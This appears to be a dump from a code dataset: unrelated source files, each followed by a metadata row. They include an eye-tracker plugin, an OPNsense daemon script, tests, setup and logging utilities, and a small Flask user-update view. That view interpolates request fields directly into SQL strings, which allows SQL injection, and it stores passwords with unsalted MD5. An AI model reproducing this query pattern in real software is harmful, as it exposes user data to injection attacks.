label = u"Revenu net imposable"
url = "http://impotsurlerevenu.org/definitions/115-revenu-net-imposable.php"
def function(self, simulation, period):
''' Revenu net imposable ou déficit à reporter'''
period = period.start.offset('first-of', 'month').period('year')
rng = simulation.calculate('rng', period)
abat_spe = simulation.calculate('abat_spe', period)
print "passe par simulation"
return period, rng - abat_spe + 10
def build_reform(tax_benefit_system):
# reference_legislation_json = tax_benefit_system.legislation_json
# reform_legislation_json = copy.deepcopy(reference_legislation_json)
# reform_legislation_json['children'].update(reform_legislation_subtree)
Reform = reforms.make_reform(
# legislation_json = reform_legislation_json,
name = u'Revenu imposable + 10',
new_formulas = [rni],
reference = tax_benefit_system,
)
return Reform()
| agpl-3.0 | 397,067,888,802,936,060 | 32.153846 | 80 | 0.713225 | false |
opnsense/core | src/opnsense/service/configd.py | 1 | 6724 | #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2019 Ad Schellevis <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------------
package : configd
function: delivers a process coordinator to handle frontend functions
"""
import os
import sys
import logging
import signal
import time
import socket
import subprocess
import syslog
import modules.processhandler
import modules.csconfigparser
from modules.daemonize import Daemonize
import cProfile
# find program path
program_path = os.path.dirname(os.path.abspath(__file__))
# set working directory to program_path
sys.path.append(program_path)
os.chdir(program_path)
def get_config():
""" open configuration
"""
cnf = modules.csconfigparser.CSConfigParser()
cnf.read('conf/configd.conf')
return cnf
def validate_config(cnf):
""" validate configuration, exit on missing item
:param cnf: config handle
"""
for config_item in ['socket_filename', 'pid_filename']:
if cnf.has_section('main') == False or cnf.has_option('main', config_item) == False:
print('configuration item main/%s not found in %s/conf/configd.conf' % (config_item, program_path))
sys.exit(0)
def main(cnf, simulate=False, single_threaded=False):
""" configd startup
:param cnf: config handle
:param simulate: simulate only
:param single_threaded: start single threaded
"""
# setup configd environment to use for all configured actions
if not cnf.has_section('environment'):
config_environment = os.environ.copy()
else:
config_environment = dict()
for envKey in cnf.items('environment'):
config_environment[envKey[0]] = envKey[1]
# run process coordinator ( on console or as daemon )
# if command-line arguments contain "emulate", start in emulation mode
if simulate:
proc_handler = modules.processhandler.Handler(socket_filename=cnf.get('main', 'socket_filename'),
config_path='%s/conf' % program_path,
config_environment=config_environment,
simulation_mode=True)
else:
proc_handler = modules.processhandler.Handler(socket_filename=cnf.get('main', 'socket_filename'),
config_path='%s/conf' % program_path,
config_environment=config_environment)
proc_handler.single_threaded = single_threaded
proc_handler.run()
def run_watch():
""" start configd process and restart if it dies unexpected
"""
current_child_pid = None
def signal_handler(sig, frame):
if current_child_pid is not None:
os.kill(current_child_pid, sig)
sys.exit(1)
signal.signal(signal.SIGTERM, signal_handler)
while True:
process = subprocess.Popen(['/usr/local/opnsense/service/configd.py', 'console'])
# save created pid for signal_handler() to use
current_child_pid = process.pid
process.wait()
# wait a small period of time before trying to restart a new process
time.sleep(0.5)
this_config = get_config()
validate_config(this_config)
if len(sys.argv) > 1 and 'console' in sys.argv[1:]:
print('run %s in console mode' % sys.argv[0])
syslog.openlog("configd.py")
if 'profile' in sys.argv[1:]:
# profile configd
# for graphical output use gprof2dot:
# gprof2dot -f pstats /tmp/configd.profile -o /tmp/callingGraph.dot
# (https://code.google.com/p/jrfonseca/wiki/Gprof2Dot)
print ("...<ctrl><c> to stop profiling")
profile = cProfile.Profile()
profile.enable(subcalls=True)
try:
if len(sys.argv) > 1 and 'simulate' in sys.argv[1:]:
print('simulate calls.')
main(cnf=this_config, simulate=True, single_threaded=True)
else:
main(cnf=this_config, single_threaded=True)
except KeyboardInterrupt:
pass
except:
raise
profile.disable()
profile.dump_stats('/tmp/configd.profile')
else:
main(cnf=this_config)
else:
# run as daemon, wrap the actual work process to enable automatic restart on sudden death
syslog_socket = "/var/run/log"
if os.path.exists(syslog_socket):
try:
# bind log handle to syslog to catch messages from Daemonize()
# (if syslog facility is active)
loghandle = logging.getLogger("configd.py")
loghandle.setLevel(logging.INFO)
handler = logging.handlers.SysLogHandler(address=syslog_socket,
facility=logging.handlers.SysLogHandler.LOG_DAEMON)
handler.setFormatter(logging.Formatter("%(name)s %(message)s"))
loghandle.addHandler(handler)
except socket.error:
loghandle = None
else:
loghandle = None
# daemonize process
daemon = Daemonize(app=__file__.split('/')[-1].split('.py')[0],
pid=this_config.get('main', 'pid_filename'),
action=run_watch,
logger=loghandle
)
daemon.start()
sys.exit(0)
| bsd-2-clause | 5,773,901,483,905,628,000 | 37.867052 | 111 | 0.625074 | false |
qvazzler/Flexget | tests/test_utils.py | 1 | 1326 | from __future__ import unicode_literals, division, absolute_import
from builtins import * # pylint: disable=unused-import, redefined-builtin
from datetime import datetime
from flexget.utils import json
class TestJson(object):
def test_json_encode_dt(self):
date_str = '2016-03-11T17:12:17Z'
dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
encoded_dt = json.dumps(dt, encode_datetime=True)
assert encoded_dt == '"%s"' % date_str
def test_json_encode_dt_dict(self):
date_str = '2016-03-11T17:12:17Z'
dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
date_obj = {'date': dt}
encoded_dt = json.dumps(date_obj, encode_datetime=True)
assert encoded_dt == '{"date": "%s"}' % date_str
def test_json_decode_dt(self):
date_str = '"2016-03-11T17:12:17Z"'
dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
decoded_dt = json.loads(date_str, decode_datetime=True)
assert dt == decoded_dt
def test_json_decode_dt_obj(self):
date_str = '"2016-03-11T17:12:17Z"'
date_obj_str = '{"date": %s}' % date_str
decoded_dt = json.loads(date_obj_str, decode_datetime=True)
dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
assert decoded_dt == {'date': dt}
| mit | 7,716,064,691,289,933,000 | 35.833333 | 74 | 0.602564 | false |
infant-cognition-tampere/drop-eyetribe-plugin | drop_eyetribe/EyetrackerEyeTribe.py | 1 | 20648 | """TheEyeTribe plugin for drop."""
from drop.Sensor import Sensor
from threading import Thread
from Queue import Queue
import socket
from select import select
import json
import nudged
import glib
import os
import re
from datetime import datetime
import time
import csv
# Regular expression to match timestamp format given by eyetribe server.
# Compiled initially during import of module.
_timestamp_matcher = re.compile(
"^(?P<year>[0-9]{4})-(?P<month>[0-9]{2})-(?P<day>[0-9]{2}) "
"(?P<hour>[0-9]{2}):(?P<minute>[0-9]{2}):(?P<second>[0-9]{2})\."
"(?P<millisecond>[0-9]{3})$")
def _parse_timestamp(ts):
m = _timestamp_matcher.match(ts)
dt = datetime(year=int(m.group('year')),
month=int(m.group('month')),
day=int(m.group('day')),
hour=int(m.group('hour')),
minute=int(m.group('minute')),
second=int(m.group('second')),
microsecond=int(
m.group('millisecond')) * 1000)
return ((time.mktime(dt.timetuple()) * 1000) +
(dt.microsecond / 1000)) * 1000.0
def _get_validity_from_state(state):
if state & 0x1 and state & 0x2 and state & 0x4:
return 0
return -1
def _convert_gazedata_frame(frame):
# >LeftEyeNx
# >LeftEyeNy
# >LeftEyePosition3dRelativeX
# >LeftEyePosition3dRelativeY
# LeftEyePosition3dRelativeZ ?
# LeftEyePosition3dX
# LeftEyePosition3dY
# LeftEyePosition3dZ
# >LeftEyePupilDiameter
# >RightEyeNx
# >RightEyeNy
# >RightEyePosition3dRelativeX
# >RightEyePosition3dRelativeY
# RightEyePosition3dRelativeZ ?
# RightEyePosition3dX ?
# RightEyePosition3dY ?
# RightEyePosition3dZ ?
# >RightEyePupilDiameter
# >TETTime
# >ValidityLeftEye
# >ValidityRightEye
# >XGazePosLeftEye
# >XGazePosRightEye
# >YGazePosLeftEye
# >YGazePosRightEye
row = {'XGazePosLeftEye': frame['lefteye']['raw']['x'],
'YGazePosLeftEye': frame['lefteye']['raw']['y'],
'XGazePosRightEye': frame['righteye']['raw']['x'],
'YGazePosRightEye': frame['righteye']['raw']['y'],
'LeftEyeNx': frame['lefteye_nudged']['raw']['x'],
'LeftEyeNy': frame['lefteye_nudged']['raw']['y'],
'RightEyeNx': frame['righteye_nudged']['raw']['x'],
'RightEyeNy': frame['righteye_nudged']['raw']['y'],
'LeftEyePosition3dRelativeX':
1.0 - frame['lefteye']['pcenter']['x'],
'LeftEyePosition3dRelativeY':
frame['lefteye']['pcenter']['y'],
'RightEyePosition3dRelativeX':
1.0 - frame['righteye']['pcenter']['x'],
'RightEyePosition3dRelativeY':
frame['righteye']['pcenter']['y'],
'LeftEyePupilDiameter': frame['lefteye']['psize'],
'RightEyePupilDiameter': frame['righteye']['psize'],
'ValidityBothEyes':
_get_validity_from_state(frame['state']),
'TETTime':
_parse_timestamp(frame['timestamp'])}
return row
def _convert_json_to_tabdelim(source_filename, dest_filename):
"""Convert file from JSON to CSV format."""
with open(source_filename, 'r') as json_file:
json_lines = json_file.readlines()
json_objects = map(json.loads, json_lines)
json_frames = filter(lambda x: 'frame' in x, json_objects)
json_tags = filter(lambda x: 'tag' in x, json_objects)
frame_dicts = [_convert_gazedata_frame(f['frame']) for f in json_frames]
frame_keys = list(frozenset(reduce(
lambda x, y: x + y, [d.keys() for d in frame_dicts])))
tag_keys = list(frozenset(reduce(
lambda x, y: x + y, [t['tag'].keys() for t in json_tags])))
tag_keys = filter(lambda x: x != 'secondary_id', tag_keys)
# Generate list of start-end tags
# Assuming that start and end tags always follow each other and that
# there are even amount of tags
assert len(json_tags) % 2 == 0
tags = zip(*[iter([t['tag'] for t in json_tags])]*2)
# Modify frame dicts to contain tag information where present
for f in frame_dicts:
frame_time = f['TETTime'] / (1000 * 1000)
for t in tags:
assert t[0]['secondary_id'] == 'start' and \
t[1]['secondary_id'] == 'end'
start_time = t[0]['timestamp']
end_time = t[1]['timestamp']
if frame_time > start_time and frame_time < end_time:
tagdict = {k: str(v) for k, v in t[0].iteritems()}
tagdict.pop('secondary_id')
f.update(tagdict)
with open(dest_filename, 'w') as csv_file:
writer = csv.DictWriter(csv_file,
fieldnames=frame_keys + tag_keys,
dialect='excel-tab')
writer.writeheader()
writer.writerows(frame_dicts)
class EyeTribeSocket(Thread):
"""Thread for socket-based communication with EyeTribe server."""
def __init__(self, host="localhost", port=6555, callback=None):
"""Constructor."""
super(EyeTribeSocket, self).__init__()
# Handle messages with callback
self.callback = callback
# Create new non-blocking socket and connect
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
self.sock.setblocking(0)
self.send_queue = Queue()
def send(self, msg):
"""
Put a packet into send queue.
Thread main loop will process it in sending phase.
"""
# TODO MAYBE: Check message validity before sending
# Put message into send_queue
self.send_queue.put(msg)
def run(self):
"""Main loop of the socket thread."""
partial_data = ""
while self.should_run:
# Get stuff from send_queue and send
while not self.send_queue.empty():
msg = self.send_queue.get(False)
self.sock.send(msg)
self.send_queue.task_done()
# Select from sockets
# TODO: Somewhat hacky solution to use 0.01 timeout,
# examine the possibility to use "signals."
read_sockets, write_sockets, err_sockets = \
select([self.sock], [], [], 0.01)
for sock in read_sockets:
if sock == self.sock:
read_data = sock.recv(512)
if not read_data:
raise IOError
read_data = partial_data + read_data
msgs = read_data.split('\n')
for msg in msgs[:-1]:
# Do a callback for received messages
if self.callback is not None:
self.callback(msg)
partial_data = msgs[-1]
def start(self):
"""Start the socket thread."""
self.should_run = True
return super(EyeTribeSocket, self).start()
def stop(self):
"""Cause the socket loop to exit."""
self.should_run = False
class EyeTribe(object):
"""
Class for interfacing with EyeTribe tracker.
Mostly handles
serialization with The Eye Tribe server and encapsulates a socket
thread.
"""
get_value_keywords = [
'push',
'heartbeatinterval',
'version',
'trackerstate',
'framerate',
'iscalibrated',
'iscalibrating',
'screenindex',
'screenresw',
'screenresh',
'screenpsyw',
'screenpsyh'
]
valid_keywords = get_value_keywords + ['calibresult', 'frame']
def __init__(self, host, port, cb_frame=None):
"""Constructor."""
self.host = host
self.port = port
self.sockthread = None
self.cb_frame = cb_frame
self.values = {}
def _init_socket(self):
if self.sockthread is not None:
return
self.sockthread = EyeTribeSocket(self.host,
self.port,
self._msg_handler)
self.sockthread.start()
def _msg_handler(self, raw_msg):
# Decode msg
msg = json.loads(raw_msg)
# assert msg.get('statuscode') == 200
if msg.get('category') == 'tracker':
# Update internal value dict
self.values.update(msg.get('values', {}))
# If frame, do a frame callback
if 'frame' in msg.get('values', {}):
self.cb_frame(msg.get('values').get('frame'))
def _gen_request(self, category, request, values):
# TODO: Some parameter validity checking here
return {'category': category,
'request': request,
'values': values}
def _gen_set_values_msg(self, values):
v = dict()
v.update(values)
v.update({'version': 2})
return self._gen_request('tracker', 'set', v)
def _gen_get_values_msg(self, values):
return self._gen_request('tracker', 'get', values)
def _gen_set_push_msg(self, state):
return self._gen_set_values_msg({'push': state})
def _start_push(self):
"""Start push mode."""
self.sockthread.send(json.dumps(self._gen_set_push_msg(True)))
def _stop_push(self):
"""Stop push mode."""
# TODO: EyeTribe server does not stop sending data after stop push
# request.
self.sockthread.send(json.dumps(self._gen_set_push_msg(False)))
def start(self):
"""Start the Eye Tribe."""
self._init_socket()
# First request all relevant values from eyetribe server
self.sockthread.send(json.dumps(self._gen_get_values_msg(
self.get_value_keywords)))
# Then start push mode
self._start_push()
def stop(self):
"""Stop the Eye Tribe."""
self._stop_push()
self.sockthread.stop()
del self.sockthread
self.sockthread = None
class EyeTribeET(Sensor):
"""Plugin class for drop."""
def __init__(self, rootdir, savedir, on_created, on_error):
"""Constructor."""
# run the superclass constructor
super(EyeTribeET, self).__init__()
self.type = 'Eyetracker'
self.control_elements = []
self.device_id = "Eyetribe eyetracker"
self.on_created = on_created
self.on_error = on_error
self.tracker = EyeTribe("localhost", 6555, self._handle_frame_callback)
self.tracker.start()
# nudged calibration values
self.nudged_current_range = None
self.nudged_domain_r = []
self.nudged_domain_l = []
self.nudged_range = []
self.nudged_transform_r = nudged.Transform(1, 0, 0, 0)
self.nudged_transform_l = nudged.Transform(1, 0, 0, 0)
self.collect_data = False
glib.idle_add(self.on_created, self)
def _handle_frame_callback(self, frame):
glib.idle_add(self._handle_gazedata_frame, frame)
def _inside_aoi(self, x, y, aoi):
return aoi[0] < x and x < aoi[1] and aoi[2] < y and y < aoi[3]
def _data_condition_check(self, rx, ry, lx, ly):
# TODO: Move this function to superclass
"""
Data condition check.
Returns True if the condition met, False if not.
"""
for cond in self.data_conditions:
if cond["type"] == "aoi":
if cond["inorout"] == "in" and \
(self._inside_aoi(rx, ry, cond["aoi"]) or
self._inside_aoi(lx, ly, cond["aoi"])):
self.data_conditions = []
return True
return False
def _handle_gazedata_frame(self, frame):
# TODO: Create a superclass version of this
# Parsing
screen_w = self.tracker.values['screenresw']
screen_h = self.tracker.values['screenresh']
gaze_left_x = frame['lefteye']['raw']['x'] / screen_w
gaze_left_y = frame['lefteye']['raw']['y'] / screen_h
gaze_right_x = frame['righteye']['raw']['x'] / screen_w
gaze_right_y = frame['righteye']['raw']['y'] / screen_h
# Put normalized coordinates back into frame
frame['lefteye']['raw']['x'] = gaze_left_x
frame['lefteye']['raw']['y'] = gaze_left_x
frame['righteye']['raw']['x'] = gaze_right_x
frame['righteye']['raw']['y'] = gaze_right_y
# TODO: Do normalization and transforms for avg coordinates as well
# Nudged transform
gaze_left_nx, gaze_left_ny = \
self.nudged_transform_l.transform([gaze_left_x, gaze_left_y])
gaze_right_nx, gaze_right_ny = \
self.nudged_transform_r.transform([gaze_right_x, gaze_right_y])
# Write data to file if recording has started
frame.update({
'lefteye_nudged': {'raw': {'x': gaze_left_x, 'y': gaze_left_y}},
'righteye_nudged': {'raw': {'x': gaze_right_x, 'y': gaze_right_y}}
})
if self.collect_data:
self.collect_file.write(json.dumps({'frame': frame}) + '\n')
# Calibration & linear transformation section
if self.nudged_current_range is not None:
# If tracking both gaze and eyes (as a validity check)
if frame['state'] & 0x3 != 0:
self.nudged_range.append(self.nudged_current_range)
self.nudged_domain_l.append([gaze_left_x, gaze_left_y])
self.nudged_domain_r.append([gaze_right_x, gaze_right_y])
# Data condition check
dc_nudged = self._data_condition_check(gaze_right_nx,
gaze_right_ny,
gaze_left_nx,
gaze_left_ny)
dc_uncalibrated = self._data_condition_check(gaze_right_x,
gaze_right_y,
gaze_left_x,
gaze_left_y)
if dc_nudged or dc_uncalibrated:
self.emit("draw_que_updated")
self.emit("data_condition_met")
# Draw eyes and gaze positions
for eye in ['left', 'right']:
self.draw_eye(eye, frame[eye + 'eye'], 1.0)
self.draw_gaze('left', gaze_left_x, gaze_left_y, 1.0)
self.draw_gaze('right', gaze_right_x, gaze_right_y, 1.0)
self.draw_gaze('leftN', gaze_left_nx, gaze_left_ny, 1.0,
{'r': 1, 'g': 1, 'b': 1})
self.draw_gaze('rightN', gaze_right_nx, gaze_right_ny, 1.0,
{'r': 1, 'g': 1, 'b': 1})
def trial_started(self, tn, tc):
"""Called when trial has started."""
return False
def trial_completed(self, name, tn, tc, misc):
"""Called when trial has completed."""
return False
def tag(self, tag):
"""Called when tag needs to be inserted into data."""
if self.collect_data:
self.collect_file.write(json.dumps({'tag': tag}) + '\n')
# check if validity is to be calculated
if tag["secondary_id"] == "start":
# go to nudged calibration mode
if "nudged_point" in tag:
# Nudged point format: "1.0, 0.5"
[x, y] = tag["nudged_point"].split(",")
xf = float(x)
yf = float(y)
self.nudged_current_range = [xf, yf]
# check if previous occurrances of this point exist
while [xf, yf] in self.nudged_range:
# find the index of the element in range
ind = self.nudged_range.index([xf, yf])
# remove the index from range and domains
self.nudged_range.pop(ind)
self.nudged_domain_l.pop(ind)
self.nudged_domain_r.pop(ind)
elif tag["secondary_id"] == "end":
if "nudged_point" in tag:
self.nudged_current_range = None
# calculate nudged transform
print "Calculating nudged calibration for right eye with " + \
"vectors: dom[" + str(len(self.nudged_domain_r)) + \
"] and range[" + str(len(self.nudged_range))
self.nudged_transform_r = nudged.estimate(self.nudged_domain_r,
self.nudged_range)
print "Calculating new calibration..."
self.nudged_transform_l = nudged.estimate(self.nudged_domain_l,
self.nudged_range)
return False
def action(self, action_id):
"""Perform actions for the control elements defined."""
print "ET: ACTION"
return False
def get_type(self):
"""Get 'type' of eye tracker."""
return self.type
def add_data_condition(self, condition):
"""Add data condition."""
print "ET: ADD DATA CONDITION"
return False
def get_device_id(self):
"""Get id of the device."""
return self.device_id
def get_control_elements(self):
"""Get control elements."""
return self.control_elements
def stop_recording(self):
"""Called when recording should be stopped."""
if self.collect_data:
self.collect_data = False
self.collect_file.close()
_convert_json_to_tabdelim(self.collect_filename + '.json',
self.collect_filename)
def start_recording(self, rootdir, participant_id, experiment_file,
section_id):
"""Called when recording should be started."""
assert not self.collect_data
expname = os.path.basename(experiment_file).split('.')[0]
fname = '%s_%s_%s.gazedata' % (expname,
participant_id,
section_id)
fname = os.path.join(rootdir, fname)
json_fname = fname + '.json'
self.collect_file = open(json_fname, 'w')
self.collect_filename = fname
metadata = json.dumps({'metadata': self.tracker.values})
self.collect_file.write(metadata + '\n')
self.collect_data = True
def disconnect(self):
"""Called when disconnect has been requested from GUI."""
self.tracker.stop()
self.emit("clear_screen")
self.remove_all_listeners()
return False
def draw_gaze(self, eye, gazepos_x, gazepos_y, opacity,
color={'r': 0, 'g': 0, 'b': 1}):
"""Draw one gazepoint."""
radius = 0.02
self.emit("add_draw_que",
eye,
{"type": "circle",
"r": color['r'],
"g": color['g'],
"b": color['b'],
"o": opacity,
"x": gazepos_x,
"y": gazepos_y,
"radius": radius})
def draw_eye(self, eye, frame_eye, opacity):
"""Draw one eye."""
camera_pos_x = 1.0 - frame_eye['pcenter']['x']
camera_pos_y = frame_eye['pcenter']['y']
screen_w = self.tracker.values['screenresw']
screen_h = self.tracker.values['screenresh']
gazepos_x = frame_eye['raw']['x'] / screen_w
gazepos_y = frame_eye['raw']['y'] / screen_h
point_x = gazepos_x - .5
point_y = gazepos_y - .5
ball_radius = 0.075
iris_radius = 0.03
pupil_radius = 0.01
x = 1 - camera_pos_x
y = camera_pos_y
self.emit("add_draw_que", eye + "ball",
{"type": "circle", "r": 1, "g": 1, "b": 1,
"o": opacity, "x": x, "y": y, "radius": ball_radius})
x = 1 - camera_pos_x + ((ball_radius - iris_radius / 2) * point_x)
y = camera_pos_y + ((ball_radius - iris_radius / 2) * point_y)
self.emit("add_draw_que", eye + "iris",
{"type": "circle", "r": 0.5, "g": 0.5, "b": 1,
"o": opacity, "x": x, "y": y, "radius": iris_radius})
self.emit("add_draw_que", eye + "pupil",
{"type": "circle", "r": 0, "g": 0, "b": 0,
"o": opacity, "x": x, "y": y, "radius": pupil_radius})
def __del__(self):
"""Destructor."""
print self.device_id + " disconnected."
| mit | 9,056,282,555,783,877,000 | 33.18543 | 79 | 0.531916 | false |
MissRoven/python | demo/app/mangeruser.py | 1 | 1063 | from . import app
import json
from flask import request,render_template,redirect,make_response,session
@app.route('/upuser')
def adduser():
return render_template('up.html',username=session['username'])
@app.route('/changeuser',methods=['POST'])
def changeuser():
change = request.form.get('change')
username =request.form.get('username')
if "show" == change:
sql = 'select * from user where username = "%s"'%(username)
tmp = app.config['cursor']._execute(sql)
cur=tmp['cur'].fetchall()
return json.dumps(cur)
elif "update" == change:
password =request.form.get('password')
email =request.form.get('email')
age =request.form.get('age')
sex =request.form.get('sex')
address =request.form.get('address')
sql = 'update user set password=md5("%s"),email="%s",age="%s",sex="%s",address="%s" where username="%s" '%(password,email,age,sex,address,username)
print sql
tmp = app.config['cursor']._execute(sql)
cur=tmp['msg']
return cur
| gpl-2.0 | -9,161,075,792,723,971,000 | 36.964286 | 155 | 0.621825 | false |
crawfordsm/indlulamithi | setup.py | 1 | 3745 | #!/usr/bin/env python
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import glob
import os
import sys
import ah_bootstrap
from setuptools import setup
#A dirty hack to get around some early import/configurations ambiguities
if sys.version_info[0] >= 3:
import builtins
else:
import __builtin__ as builtins
builtins._ASTROPY_SETUP_ = True
from astropy_helpers.setup_helpers import (
register_commands, adjust_compiler, get_debug_option, get_package_info)
from astropy_helpers.git_helpers import get_git_devstr
from astropy_helpers.version_helpers import generate_version_py
# Get some values from the setup.cfg
from distutils import config
conf = config.ConfigParser()
conf.read(['setup.cfg'])
metadata = dict(conf.items('metadata'))
PACKAGENAME = metadata.get('package_name', 'packagename')
DESCRIPTION = metadata.get('description', 'Astropy affiliated package')
AUTHOR = metadata.get('author', '')
AUTHOR_EMAIL = metadata.get('author_email', '')
LICENSE = metadata.get('license', 'unknown')
URL = metadata.get('url', 'http://astropy.org')
# Get the long description from the package's docstring
__import__(PACKAGENAME)
package = sys.modules[PACKAGENAME]
LONG_DESCRIPTION = package.__doc__
# Store the package name in a built-in variable so it's easy
# to get from other parts of the setup infrastructure
builtins._ASTROPY_PACKAGE_NAME_ = PACKAGENAME
# VERSION should be PEP386 compatible (http://www.python.org/dev/peps/pep-0386)
VERSION = '0.1.dev'
# Indicates if this version is a release version
RELEASE = 'dev' not in VERSION
if not RELEASE:
VERSION += get_git_devstr(False)
# Populate the dict of setup command overrides; this should be done before
# invoking any other functionality from distutils since it can potentially
# modify distutils' behavior.
cmdclassd = register_commands(PACKAGENAME, VERSION, RELEASE)
# Adjust the compiler in case the default on this platform is to use a
# broken one.
adjust_compiler(PACKAGENAME)
# Freeze build information in version.py
generate_version_py(PACKAGENAME, VERSION, RELEASE,
get_debug_option(PACKAGENAME))
# Treat everything in scripts except README.rst as a script to be installed
scripts = [fname for fname in glob.glob(os.path.join('scripts', '*'))
if os.path.basename(fname) != 'README.rst']
# Get configuration information from all of the various subpackages.
# See the docstring for setup_helpers.update_package_files for more
# details.
package_info = get_package_info()
# Add the project-global data
package_info['package_data'].setdefault(PACKAGENAME, [])
package_info['package_data'][PACKAGENAME].append('data/*')
# Define entry points for command-line scripts
entry_points = {}
entry_points['console_scripts'] = [
'astropy-package-template-example = packagename.example_mod:main',
]
# Include all .c files, recursively, including those generated by
# Cython, since we can not do this in MANIFEST.in with a "dynamic"
# directory name.
c_files = []
for root, dirs, files in os.walk(PACKAGENAME):
for filename in files:
if filename.endswith('.c'):
c_files.append(
os.path.join(
os.path.relpath(root, PACKAGENAME), filename))
package_info['package_data'][PACKAGENAME].extend(c_files)
setup(name=PACKAGENAME,
version=VERSION,
description=DESCRIPTION,
scripts=scripts,
requires=['astropy'],
install_requires=['astropy'],
provides=[PACKAGENAME],
author=AUTHOR,
author_email=AUTHOR_EMAIL,
license=LICENSE,
url=URL,
long_description=LONG_DESCRIPTION,
cmdclass=cmdclassd,
zip_safe=False,
use_2to3=True,
entry_points=entry_points,
**package_info
)
| bsd-3-clause | 1,335,141,643,837,184,800 | 31.284483 | 79 | 0.722296 | false |
nfqsolutions/pylm-registry | pylm/registry/clients/logs.py | 1 | 1616 | import json
from urllib import parse
from tornado.httpclient import HTTPClient
class LogClient(object):
"""
Client to send and retrieve logs
"""
def __init__(self, uri, cluster):
self.uri = uri
self.cluster = cluster
def send(self, text):
"""
Send a log line to the registry
:param text: Text of the log line
"""
arguments = {
'cluster': self.cluster,
}
client = HTTPClient()
client.fetch('{}/logs?{}'.format(
self.uri, parse.urlencode(arguments)),
method='POST',
body=text
)
def download(self, fr=None, to=None):
"""
Download the log lines, that you may filter by time
:param fr: datetime. Log lines from
:param to: datetime. Log lines to
:return: A list with dicts
"""
arguments = {
'cluster': self.cluster
}
if fr:
arguments['fr'] = fr
if to:
arguments['to'] = to
client = HTTPClient()
response = client.fetch('{}/logs?{}'.format(
self.uri, parse.urlencode(arguments)),
)
return json.loads(response.body.decode('utf-8'))
def view(self, fr=None, to=None):
"""
Pretty print the log lines
:param fr: datetime. Log lines from
:param to: datetime. Log lines to
:return:
"""
for log_line in self.download(fr, to):
print(log_line['when'], log_line['text'])
def delete(self):
raise NotImplementedError() | agpl-3.0 | 1,886,138,002,118,353,000 | 22.779412 | 59 | 0.525371 | false |
BeyondTheClouds/enoslib | enoslib/docker.py | 1 | 5041 | """Manage remote docker containers as first class citizens.
A possible workflow would be to start your containers using the method of
your choice and build the list of available dockers using the
:py:func:`enoslib.docker.get_dockers` function.
A ``DockerHost`` is a specialization of a ``Host`` and thus can be fed into
any Host related operations (play_on, run_command...) [#docker0]_. Hosts
datastructure in enoslib are tied somehow to Ansible. DockerHost is shaped so
that the docker connection plugin can run. So we inject at build time the
necessary connection options (``ansible_connection=docker``,
``ansible_docker_extra_args="-H <remote_docker>"``).
Connections to remote docker daemons can be made using different
protocols [#docker1]_.
- Using ssh: requires ssh access to remote host but
can go through a bastion host if .ssh/config is configured correctly.
Note that the docker client must be available.
- Using raw tcp: requires to reach the remote docker daemon (e.g be inside
g5k). Note that in this case the remote socket must be exposed.
Additionaly the structure is compatible with mitogen and its delegation model
[#docker2]_ which can improve the performance. Note that the facts from the
host machines (where the docker daemon runs) needs to be gathered. One way to
ensure this is to explictly gather the facts from such hosts.
.. topic:: Links
.. [#docker0] https://en.wikipedia.org/wiki/Liskov_substitution_principle
.. [#docker1] https://docs.docker.com/engine/reference/commandline/dockerd
.. [#docker2] https://mitogen.networkgenomics.com/ansible_detailed.html
Example:
.. literalinclude:: examples/advanced_docker.py
:language: python
:linenos:
"""
import json
from typing import List, Mapping, Optional
from enoslib.api import run_command, get_hosts
from enoslib.objects import Host, Roles
class DockerHost(Host):
"""A kind of host reachable using docker protocol.
Args:
alias: **unique** name accross the deployment
name : name of the docker container on the remote hosts
host : the host where the container can be found
proto: how to connect to the remote host
(DockerHost.PROTO_TCP/DockerHost.PROTO_SSH)
[Default DockerHost.PROTO_SSH]
state: dict representing the state as returned by ``docker inspect``
"""
PROTO_SSH = "ssh"
PROTO_TCP = "tcp"
def __init__(
self,
alias: str,
container_name: str,
host: Host,
proto: Optional[str] = None,
state: Optional[Mapping] = None,
):
self.remote = host.address
if proto is None:
proto = self.PROTO_SSH
self.proto = proto
if self.proto not in [self.PROTO_SSH, self.PROTO_TCP]:
raise ValueError(f"proto must be in {[self.PROTO_SSH, self.PROTO_TCP]}")
if host.user:
self.remote = f"{host.user}@{host.address}"
else:
self.remote = f"{host.address}"
# Optionaly keep the internal state (return by docker inspect)
# Note that currently we don't provide, any consistency guarantee.
self._state = {} if state is None else state
super().__init__(
container_name,
alias=alias,
user=host.user,
keyfile=host.keyfile,
extra=dict(
ansible_connection="docker",
ansible_docker_extra_args=f"-H {proto}://{self.remote}",
mitogen_via=f"{host.user}@{host.address}",
),
)
@classmethod
def from_state(cls, state: Mapping, host: Host):
"""Build a DockerHost from a state json as returned by docker inspect."""
container_name = state["Name"]
alias = f"{container_name}-{host.alias}"
return cls(alias, container_name, host, state=state)
